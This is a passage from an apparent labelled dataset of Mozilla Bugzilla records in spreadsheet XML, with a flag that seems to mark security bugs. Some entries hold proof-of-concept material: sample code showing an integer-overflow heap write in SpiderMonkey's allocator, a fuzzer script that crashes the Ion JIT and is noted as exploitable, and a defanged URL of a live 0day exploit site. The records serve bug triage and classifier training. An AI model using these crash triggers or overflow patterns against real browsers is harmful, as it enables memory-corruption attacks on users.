  06B5D160    PPC  0599FF84  nsBoxFrame::GetChildBoxInfo(nsIPresContext*, const
nsHTMLReflowS
tate&amp;, nsIFrame*, nsCalculatedBoxInfo&amp;)+0007C
  06B5D060    PPC  059A27CC  nsBoxFrame::GetBoxInfo(nsIPresContext*, const
nsHTMLReflowState&amp;
, nsBoxInfo&amp;)+000B4
  06B5CFA0    PPC  0599FF84  nsBoxFrame::GetChildBoxInfo(nsIPresContext*, const
nsHTMLReflowS
tate&amp;, nsIFrame*, nsCalculatedBoxInfo&amp;)+0007C
 Return addresses on the stack
  Stack Addr  Frame Addr   ISA   Caller
   06B5D1CC                68K   04DB8F7A
   06B5D1B8                68K   05F798CA malloc+00042
   06B5D1A8                PPC   055C840C nsViewManager::UpdateView(nsIView*,
const nsRect&amp;,
unsigned int)+001F0
   06B5D168                PPC   059A27CC
nsBoxFrame::GetBoxInfo(nsIPresContext*, const nsHTM
LReflowState&amp;, nsBoxInfo&amp;)+000B4
   06B5D138    06B5D130    PPC   05C4B278 nsWindow::Invalidate(const nsRect&amp;,
int)+000FC
   06B5D114    06B5D110    68K   06B5D1F6
   06B5D108    06B5D100    PPC   059E96CC nsDST::Search(void*, unsigned int,
void**)+0003C
   06B5D100                68K   06B5D13E
   06B5D0F8    06B5D0F0    PPC   FFD1F0FC SetPort+0001C
   06B5D0B8    06B5D0B0    PPC   003F26E0 NQDSetPort+00034
   06B5D0A8    06B5D0A0    PPC   003EB584 NQDSetOrigin+00020
   06B5D088    06B5D080    PPC   05C4D25C nsWindow::CalcOffset(int&amp;, int&amp;)+000B4
   06B5D068    06B5D060    PPC   0599FF84
nsBoxFrame::GetChildBoxInfo(nsIPresContext*, const
nsHTMLReflowState&amp;, nsIFrame*, nsCalculatedBoxInfo&amp;)+0007C
   06B5D028    06B5D020    PPC   FFD1FCF0 SetEmptyRgn+0001C
   06B5D018    06B5D010    PPC   05786AA0 AtomKey::~AtomKey()+00048
   06B5D008                68K   05F798CA malloc+00042
   06B5CFF8    06B5CFF0    PPC   006A97A4 DoubleClickWindowTitle+00A8C
   06B5CFE8    06B5CFE0    PPC   003F3F18 NQDSetEmptyRgn+00048
   06B5CFB8    06B5CFB0    PPC   FFD1FE68 UnionRgn+00024
   06B5CFAC                68K   0520011E
   06B5CFA8    06B5CFA0    PPC   059A27CC
nsBoxFrame::GetBoxInfo(nsIPresContext*, const nsHTM
LReflowState&amp;, nsBoxInfo&amp;)+000B4
   06B5CF80                68K   06B5CFBE
   06B5CF78    06B5CF70    PPC   003F4090 NQDUnionRgn+0006C
   06B5CF48    06B5CF40    PPC   05786AA0 AtomKey::~AtomKey()+00048
   06B5CF18    06B5CF10    PPC   003E0EDC TrimRect+00FB8
   06B5CED8    06B5CED0    PPC   FFD1A788 DisposeHandle+00028
   06B5CEC8    06B5CEC0    PPC   003E0A3C TrimRect+00B18
   06B5CEA8    06B5CEA0    PPC   0599FF84
nsBoxFrame::GetChildBoxInfo(nsIPresContext*, const
nsHTMLReflowState&amp;, nsIFrame*, nsCalculatedBoxInfo&amp;)+0007C
   06B5CDF8    06B5CDF0    PPC   003A43EC __SetHandleSize+00014
   06B5CDE8    06B5CDE0    PPC   05A09528
nsGfxScrollFrame::GetBoxInfo(nsIPresContext*, const
 nsHTMLReflowState&amp;, nsBoxInfo&amp;)+00128
 Displaying memory from sp
  06B5CDE0  06B5 CEA0 0000 A024  05A0 952C 0000 002C  ¥µÎ ¥¥ $¥ •,¥¥¥,
  06B5CDF0  06B5 CE30 0660 8010  003A 43F0 0000 0000  ¥µÎ0¥`€¥¥:Cð¥¥¥¥
  06B5CE00  0000 0000 0015 3C64  0000 0000 0000 0000  ¥¥¥¥¥¥&lt;d¥¥¥¥¥¥¥¥
  06B5CE10  0000 0000 416F FFFF  0000 000F 0000 0000  ¥¥¥¥Aoÿÿ¥¥¥¥¥¥¥¥
  06B5CE20  0000 0000 0000 0000  0000 0000 0000 0000  ¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥
  06B5CE30  4000 0000 4000 0000  0000 0000 0666 AFAC  @¥¥¥@¥¥¥¥¥¥¥¥f¯¬
  06B5CE40  0000 0000 0000 0000  0000 0000 0000 0000  ¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥
  06B5CE50  4000 0000 4000 0000  0000 0000 0666 AFAC  @¥¥¥@¥¥¥¥¥¥¥¥f¯¬
 Displaying memory from 0
  00000000  FFC1 0000 FFC1 0000  0023 FAC0 002E CDD8  ÿÁ¥¥ÿÁ¥¥¥#úÀ¥.ÍØ
  00000010  002E CDDA 002E CDDC  FFC0 5608 FFC0 560A  ¥.ÍÚ¥.ÍÜÿÀV¥ÿÀV¥
 Closing log</t>
        </is>
      </c>
      <c r="X4115" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4116">
      <c r="A4116" t="n">
        <v>1208665</v>
      </c>
      <c r="B4116" t="inlineStr">
        <is>
          <t>2015-09-25 16:00:42 -0700</t>
        </is>
      </c>
      <c r="C4116" t="inlineStr">
        <is>
          <t>TempAllocPolicy::pod_* suffer from integer overflow issues</t>
        </is>
      </c>
      <c r="D4116" t="inlineStr">
        <is>
          <t>2016-07-02 11:29:08 -0700</t>
        </is>
      </c>
      <c r="E4116" t="n">
        <v>1</v>
      </c>
      <c r="F4116" t="n">
        <v>1</v>
      </c>
      <c r="G4116" t="n">
        <v>3</v>
      </c>
      <c r="H4116" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4116" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4116" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4116" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4116" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4116" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4116" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4116" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4116" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q4116" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4116" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4116" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T4116" t="n">
        <v>1</v>
      </c>
      <c r="U4116" t="n">
        <v>0</v>
      </c>
      <c r="V4116" t="n">
        <v>29</v>
      </c>
      <c r="W4116" t="inlineStr">
        <is>
          <t>For example:
    template &lt;typename T&gt;
    T* pod_malloc(size_t numElems) {
        T* p = js_pod_malloc&lt;T&gt;(numElems);
        if (MOZ_UNLIKELY(!p))
            p = static_cast&lt;T*&gt;(onOutOfMemory(AllocFunction::Malloc, numElems * sizeof(T)));
        return p;
    }
js_pod_malloc does just fine with integer overflow, returning nullptr in that case.  But then we call the onOutOfMemory function, passing in a multiplication that may well have overflowed.  And that function ultimately delegates to this:
JS_FRIEND_API(void*)
JSRuntime::onOutOfMemory(AllocFunction allocFunc, size_t nbytes, void* reallocPtr,
                         JSContext* maybecx)
{
    MOZ_ASSERT_IF(allocFunc != AllocFunction::Realloc, !reallocPtr);
    if (isHeapBusy())
        return nullptr;
    if (!oom::IsSimulatedOOMAllocation()) {
        /*
         * Retry when we are done with the background sweeping and have stopped
         * all the allocations and released the empty GC chunks.
         */
        gc.onOutOfMallocMemory();
        void* p;
        switch (allocFunc) {
          case AllocFunction::Malloc:
            p = js_malloc(nbytes);
            break;
          ...
        }
        if (p)
            return p;
    }
So something like this:
    typedef struct { uint32_t arr[1024]; } Bunch;
    TempAllocPolicy talloc(cx);
    Bunch* b = talloc.pod_malloc&lt;Bunch&gt;(2 * 1048576);
    if (!b)
        return false;
    for (size_t i = 0; i &lt; 2 * 1048576; i++)
        b[i].arr[1023] = 17;
would result in JSRuntime::onOutOfMemory being called (on a 32-bit system) with nbytes=0, and so the above loop would write beyond the (0-byte, probably 4-byte under the hood) allocation that backs far, far less than the entirety of |b|.
This is obviously bad, but I don't know if it's used in a place that doesn't have its *own* integer overflow detection.  Vector has its own, and Vector is probably one of the bigger users of this.  But it seems a fool's errand to try to check every caller, so I think we should assume the worst and fix this.
I found this while investigating bug 1207519, for what it's worth.  We probably should audit all the other AllocPolicy implementations and ensure none of them have a similar problem, too, while we're at it.</t>
        </is>
      </c>
      <c r="X4116" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4117">
      <c r="A4117" t="n">
        <v>1363120</v>
      </c>
      <c r="B4117" t="inlineStr">
        <is>
          <t>2017-05-08 11:10:18 -0700</t>
        </is>
      </c>
      <c r="C4117" t="inlineStr">
        <is>
          <t>Stop syncing javascript.enabled</t>
        </is>
      </c>
      <c r="D4117" t="inlineStr">
        <is>
          <t>2017-05-09 05:52:34 -0700</t>
        </is>
      </c>
      <c r="E4117" t="n">
        <v>1</v>
      </c>
      <c r="F4117" t="n">
        <v>1</v>
      </c>
      <c r="G4117" t="n">
        <v>2</v>
      </c>
      <c r="H4117" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4117" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4117" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K4117" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4117" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4117" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4117" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4117" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4117" t="inlineStr"/>
      <c r="Q4117" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4117" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4117" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T4117" t="n">
        <v>1</v>
      </c>
      <c r="U4117" t="n">
        <v>0</v>
      </c>
      <c r="V4117" t="n">
        <v>5</v>
      </c>
      <c r="W4117" t="inlineStr">
        <is>
          <t>Sync syncs whether javascript.enabled is toggled. It should stop doing that.</t>
        </is>
      </c>
      <c r="X4117" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4118">
      <c r="A4118" t="n">
        <v>675212</v>
      </c>
      <c r="B4118" t="inlineStr">
        <is>
          <t>2011-07-29 08:04:40 -0700</t>
        </is>
      </c>
      <c r="C4118" t="inlineStr">
        <is>
          <t>Generate wait times emails from production buildapi repo</t>
        </is>
      </c>
      <c r="D4118" t="inlineStr">
        <is>
          <t>2017-05-08 09:48:46 -0700</t>
        </is>
      </c>
      <c r="E4118" t="n">
        <v>1</v>
      </c>
      <c r="F4118" t="n">
        <v>1</v>
      </c>
      <c r="G4118" t="n">
        <v>5</v>
      </c>
      <c r="H4118" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4118" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4118" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4118" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4118" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4118" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4118" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4118" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4118" t="inlineStr"/>
      <c r="Q4118" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4118" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4118" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4118" t="n">
        <v>1</v>
      </c>
      <c r="U4118" t="n">
        <v>0</v>
      </c>
      <c r="V4118" t="n">
        <v>3</v>
      </c>
      <c r="W4118" t="inlineStr">
        <is>
          <t>At the moment anamarias@cruncher has a cron job that runs 
  ~anamarias/bin/midnight_mailwaittimes.sh
which calls
  ~anamarias/buildapi/buildapi/scripts/mailwaittimes.py
which is a modified from what we have in production. It does hit the production instance to get the build data.
We should look at the changes in Anamaria's repo, and move the cron over to the rest of 'production', aka catlee's cron.</t>
        </is>
      </c>
      <c r="X4118" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4119">
      <c r="A4119" t="n">
        <v>2133</v>
      </c>
      <c r="B4119" t="inlineStr">
        <is>
          <t>1998-06-16 07:00:00 -0700</t>
        </is>
      </c>
      <c r="C4119" t="inlineStr">
        <is>
          <t>[PP]Jan25:Mac freezes waiting for data</t>
        </is>
      </c>
      <c r="D4119" t="inlineStr">
        <is>
          <t>2000-03-22 13:30:31 -0800</t>
        </is>
      </c>
      <c r="E4119" t="n">
        <v>1</v>
      </c>
      <c r="F4119" t="n">
        <v>1</v>
      </c>
      <c r="G4119" t="n">
        <v>3</v>
      </c>
      <c r="H4119" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4119" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="J4119" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="K4119" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4119" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M4119" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4119" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4119" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4119" t="inlineStr"/>
      <c r="Q4119" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4119" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4119" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4119" t="n">
        <v>1</v>
      </c>
      <c r="U4119" t="n">
        <v>0</v>
      </c>
      <c r="V4119" t="n">
        <v>31</v>
      </c>
      <c r="W4119" t="inlineStr">
        <is>
          <t>(This bug imported from BugSplat, Netscape's internal bugsystem.  It
was known there as bug #142690
http://scopus.netscape.com/bugsplat/show_bug.cgi?id=142690
Imported into Bugzilla on 01/04/99 16:10)
Surf for a few pages, and the mac will freeze up in Delay(). What appears is
happening is NSPR is waiting for data (which never arrives), so it goes into an
infinite loop until something arrives, scheduling the main thread, sleeping,
waking up, and rescheduling. This starves out the UI so the mac appears frozen.</t>
        </is>
      </c>
      <c r="X4119" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4120">
      <c r="A4120" t="n">
        <v>408329</v>
      </c>
      <c r="B4120" t="inlineStr">
        <is>
          <t>2007-12-13 23:07:35 -0800</t>
        </is>
      </c>
      <c r="C4120" t="inlineStr">
        <is>
          <t>Mac OS X Java Plugin (JEP) - LiveConnect can still use document.domain bypass to create arbitrary socket connections</t>
        </is>
      </c>
      <c r="D4120" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E4120" t="n">
        <v>1</v>
      </c>
      <c r="F4120" t="n">
        <v>1</v>
      </c>
      <c r="G4120" t="n">
        <v>6</v>
      </c>
      <c r="H4120" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4120" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4120" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K4120" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4120" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M4120" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4120" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4120" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4120" t="inlineStr">
        <is>
          <t>[sg:high] fixed by 413161</t>
        </is>
      </c>
      <c r="Q4120" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R4120" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4120" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4120" t="n">
        <v>1</v>
      </c>
      <c r="U4120" t="n">
        <v>0</v>
      </c>
      <c r="V4120" t="n">
        <v>50</v>
      </c>
      <c r="W4120" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Apple has released Java for Mac OS X 10.4, Release 6  ( available from http://www.apple.com/support/downloads/javaformacosx104release6.html ).  The update appears to contain fixes for the DNS rebinding vulnerabilities discussed in bug #389625.  
Even though the Java runtime has been updated, the Firefox Mac OS X Java Plugin (MRJ Plugin) appears to remain vulnerable to the 'document.domain' bypass.  By using the document.domain exception to the same origin policy, LiveConnect can be used to create arbitrary socket connections.
Sun Java Runtime Environment fixes for Windows and Linux were released at the beginning of October.  With the Sun JRE updates, the Firefox Java plugins on these platforms are no longer vulnerable to the document.domain bypass.
A demo showing how connections can be made to a localhost web server via the loopback device is available from the URL above.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X4120" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4121">
      <c r="A4121" t="n">
        <v>1092947</v>
      </c>
      <c r="B4121" t="inlineStr">
        <is>
          <t>2014-11-03 00:11:58 -0800</t>
        </is>
      </c>
      <c r="C4121" t="inlineStr">
        <is>
          <t>Crash [@ EnterIon] or [@ js::jit::IonCannon]</t>
        </is>
      </c>
      <c r="D4121" t="inlineStr">
        <is>
          <t>2016-06-04 16:07:49 -0700</t>
        </is>
      </c>
      <c r="E4121" t="n">
        <v>1</v>
      </c>
      <c r="F4121" t="n">
        <v>1</v>
      </c>
      <c r="G4121" t="n">
        <v>3</v>
      </c>
      <c r="H4121" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4121" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4121" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K4121" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4121" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4121" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4121" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4121" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4121" t="inlineStr">
        <is>
          <t>[adv-main36+]</t>
        </is>
      </c>
      <c r="Q4121" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4121" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4121" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T4121" t="n">
        <v>1</v>
      </c>
      <c r="U4121" t="n">
        <v>0</v>
      </c>
      <c r="V4121" t="n">
        <v>31</v>
      </c>
      <c r="W4121" t="inlineStr">
        <is>
          <t>Created attachment 8515803
stack
function z(f) {
    try {
        f()
    } catch (e) {}
}
s = newGlobal()
s["z"] = this["z"].bind()
evalcx("\
    function a() {\
        x()(x())(x())\
    }\
    function b() {\
        a(Math.imul())\
    }\
    function c() {\
        a(Math.imul());\
        a(Math.imul());\
        a()\
    }\
    function d() {\
        x(x()) * c() + (y &gt; y)\
    }\
    function e(y) {\
        +c() ? x(d()) : b(y &gt; 0)\
    }\
    z(a);\
    a = function() {};\
    function p() {\
        d(e())\
    }\
    z(p);\
    function q() {\
        e(q()(q(e()())))\
    }\
    q()\
", s)
crashes js opt shell on m-c changeset 0b81c10a9074 with --ion-eager --no-threads --ion-regalloc=backtracking at EnterIon with js::jit::IonCannon on the stack.
Debug configure options:
MAKE=mozmake AR=ar sh c://Users//mozillaadmin//trees//mozilla-central//js//src//configure --disable-debug --enable-optimize --enable-nspr-build --enable-more-deterministic --enable-gczeal --enable-debug-symbols --disable-tests
(This does not seem to affect debug shells.)
!exploitable mentions that this is exploitable, so setting s-s and assuming sec-critical.
autoBisect is running. Setting needinfo? from Jan as a start.</t>
        </is>
      </c>
      <c r="X4121" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4122">
      <c r="A4122" t="n">
        <v>1271037</v>
      </c>
      <c r="B4122" t="inlineStr">
        <is>
          <t>2016-05-07 02:06:06 -0700</t>
        </is>
      </c>
      <c r="C4122" t="inlineStr">
        <is>
          <t>Wrong numOperands in RRegExpMatcher, RRegExpSearcher, and RRegExpTester.</t>
        </is>
      </c>
      <c r="D4122" t="inlineStr">
        <is>
          <t>2017-01-05 09:08:13 -0800</t>
        </is>
      </c>
      <c r="E4122" t="n">
        <v>1</v>
      </c>
      <c r="F4122" t="n">
        <v>1</v>
      </c>
      <c r="G4122" t="n">
        <v>3</v>
      </c>
      <c r="H4122" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4122" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4122" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K4122" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4122" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4122" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4122" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4122" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4122" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main47+]</t>
        </is>
      </c>
      <c r="Q4122" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4122" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4122" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T4122" t="n">
        <v>1</v>
      </c>
      <c r="U4122" t="n">
        <v>0</v>
      </c>
      <c r="V4122" t="n">
        <v>21</v>
      </c>
      <c r="W4122" t="inlineStr">
        <is>
          <t>https://dxr.mozilla.org/mozilla-central/rev/e5a10bc7dac4ee2453d8319165c1f6578203eac7/js/src/jit/Recover.h#568
&gt; class RRegExpMatcher final : public RInstruction
&gt; {
&gt;   public:
&gt;     RINSTRUCTION_HEADER_(RegExpMatcher)
&gt; 
&gt;     virtual uint32_t numOperands() const {
&gt;         return 5;
&gt;     }
&gt; 
&gt;     bool recover(JSContext* cx, SnapshotIterator&amp; iter) const;
&gt; };
It should be 3 (or 4 before bug 1263340).
setting s-s just in case.
(I don't see any case this is used tho)</t>
        </is>
      </c>
      <c r="X4122" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4123">
      <c r="A4123" t="n">
        <v>607222</v>
      </c>
      <c r="B4123" t="inlineStr">
        <is>
          <t>2010-10-25 21:28:45 -0700</t>
        </is>
      </c>
      <c r="C4123" t="inlineStr">
        <is>
          <t>Interleaving document.write and appendChild can lead to duplicate text frames and overrunning of text run buffers</t>
        </is>
      </c>
      <c r="D4123" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E4123" t="n">
        <v>1</v>
      </c>
      <c r="F4123" t="n">
        <v>1</v>
      </c>
      <c r="G4123" t="n">
        <v>3</v>
      </c>
      <c r="H4123" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4123" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4123" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4123" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4123" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4123" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4123" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4123" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4123" t="inlineStr">
        <is>
          <t>[sg:critical] 0day</t>
        </is>
      </c>
      <c r="Q4123" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4123" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4123" t="inlineStr">
        <is>
          <t>mozilla2.0b7</t>
        </is>
      </c>
      <c r="T4123" t="n">
        <v>1</v>
      </c>
      <c r="U4123" t="n">
        <v>0</v>
      </c>
      <c r="V4123" t="n">
        <v>81</v>
      </c>
      <c r="W4123" t="inlineStr">
        <is>
          <t>Created attachment 485975
PoC (without the binary)
Morten Kråkvik of Telenor SOC reported an in-the-wild 0day affecting Firefox 3.6.x on Windows to security@:
=========================================================================
A compromised site is currently redirecting visitors to
hxxp://l-3com.dyndns-work.com/admissions/admin.php, which contains
exploits directed at Firefox users on Windows.
The exploit is confirmed successful on Windows XP SP3 + Firefox
3.6.11.</t>
        </is>
      </c>
      <c r="X4123" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4124">
      <c r="A4124" t="n">
        <v>959531</v>
      </c>
      <c r="B4124" t="inlineStr">
        <is>
          <t>2014-01-14 02:51:22 -0800</t>
        </is>
      </c>
      <c r="C4124" t="inlineStr">
        <is>
          <t>settings &amp; history ID bug</t>
        </is>
      </c>
      <c r="D4124" t="inlineStr">
        <is>
          <t>2014-09-02 06:42:14 -0700</t>
        </is>
      </c>
      <c r="E4124" t="n">
        <v>1</v>
      </c>
      <c r="F4124" t="n">
        <v>1</v>
      </c>
      <c r="G4124" t="n">
        <v>2</v>
      </c>
      <c r="H4124" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4124" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4124" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4124" t="inlineStr">
        <is>
          <t>26 Branch</t>
        </is>
      </c>
      <c r="L4124" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4124" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4124" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4124" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4124" t="inlineStr">
        <is>
          <t>[adv-main27+]</t>
        </is>
      </c>
      <c r="Q4124" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4124" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4124" t="inlineStr">
        <is>
          <t>Firefox 29</t>
        </is>
      </c>
      <c r="T4124" t="n">
        <v>1</v>
      </c>
      <c r="U4124" t="n">
        <v>0</v>
      </c>
      <c r="V4124" t="n">
        <v>20</v>
      </c>
      <c r="W4124" t="inlineStr">
        <is>
          <t>Created attachment 8359715
bug.png
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 (Beta/Release)
Build ID: 20131205075310
Steps to reproduce:
Create an html page with the following markup:
&lt;button name="settings" id="settings"&gt;settings&lt;/button&gt;
&lt;button name="history" id="history"&gt;history&lt;/button&gt;
Actual results:
when i click on the settings button, it opens the settings of the firefox, 
same results for the histroy button, it opens the firefox histroy window.
Expected results:
It should invoke my code whether its JavaScript or any other action.</t>
        </is>
      </c>
      <c r="X4124" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4125">
      <c r="A4125" t="n">
        <v>718516</v>
      </c>
      <c r="B4125" t="inlineStr">
        <is>
          <t>2012-01-16 14:12:12 -0800</t>
        </is>
      </c>
      <c r="C4125" t="inlineStr">
        <is>
          <t>crash @xul!nsOverflowContinuationTracker::SetUpListWalker</t>
        </is>
      </c>
      <c r="D4125" t="inlineStr">
        <is>
          <t>2013-05-13 13:39:30 -0700</t>
        </is>
      </c>
      <c r="E4125" t="n">
        <v>1</v>
      </c>
      <c r="F4125" t="n">
        <v>1</v>
      </c>
      <c r="G4125" t="n">
        <v>3</v>
      </c>
      <c r="H4125" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4125" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4125" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4125" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4125" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4125" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
